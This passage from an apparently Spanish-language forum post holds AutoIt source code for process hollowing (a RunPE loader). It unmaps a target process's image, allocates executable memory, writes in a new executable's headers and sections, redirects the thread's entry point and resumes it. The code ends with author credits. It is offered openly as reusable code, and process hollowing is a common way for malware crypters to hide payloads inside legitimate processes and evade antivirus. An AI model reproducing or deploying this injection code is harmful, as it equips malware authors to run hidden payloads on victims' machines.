Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
#region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED
$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)
If @error Or $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(6, 0, 0)
EndIf
#region 6. ALLOCATE 'NEW' MEMORY SPACE
$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $PREMOTECODE = $ACALL[0]
#region 7. GET AND WRITE NEW PE-HEADERS
Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)
Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(8, 0, 0)
EndIf
#region 8. WRITE SECTIONS
Local $TIMAGE_SECTION_HEADER
Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA
Local $IVIRTUALADDRESS
For $I = 1 To $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)
$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")
$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")
$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")
If $ISIZEOFRAWDATA Then
$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(9, $I, 0)
EndIf
EndIf
$PPOINTER += 40
Next
#region 9. NEW ENTRY POINT
DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)
#region 10. SET NEW CONTEXT
$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))
If @error Or Not $ACALL[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(10, 0, 0)
EndIf
#region 11. RESUME THREAD
$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)
If @error Or $ACALL[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)
Return SetError(11, 0, 0)
EndIf
#region 12. RETURN SUCCESS
Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")
EndFunc
;Créditos: A.D.I Fênix
[/lenguaje]
Fuente: C-51
Saludos
Last edited by a moderator: